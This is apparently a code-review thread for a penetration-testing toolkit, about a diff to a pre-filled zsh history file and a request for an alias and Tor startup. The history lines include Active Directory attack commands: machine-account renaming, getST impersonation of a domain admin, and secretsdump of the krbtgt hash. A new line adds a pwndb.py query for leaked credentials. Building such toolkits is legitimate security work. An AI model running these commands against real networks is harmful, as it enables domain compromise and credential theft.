sources/zsh/history

```diff
@@ -322,4 +322,5 @@ renameMachine.py -current-name "DC01" -new-name "testcomputer$" -dc-ip dc01 "dom
 KRB5CCNAME="DC01.ccache" getST.py -self -impersonate "domainadmin" -spn "cifs/dc01.domain.local" -k -no-pass -dc-ip dc01 "domain.local"/"dc01"
 KRB5CCNAME="domainadmin.ccache" secretsdump -just-dc-user "krbtgt" -dc-ip dc01 -k -no-pass @"dc01.domain.local"
 KRB5CCNAME="domainadmin.ccache" secretsdump -just-dc-user "krbtgt" -dc-ip dc01 -k -no-pass @"dc01.domain.local"
+./pwndb.py --target @example.com --output txt
```

Comment:
Can you add an alias to in `sources/zsh/aliases` like `alias pwndb.py='/opt/tools/pwndb/pwndb.py'` so that users don't need to move to the install directory?
Once the alias is added, you can remove the `.\` in the history command
Can you also add the necessary command to start the Tor proxy?

Reply:
Done monsieur shutdown.

Installation of Tor already put the binary in /usr/bin/. So just need to type `tor` or `tor &` if you want to free your shell

Reply:
Perfect 👌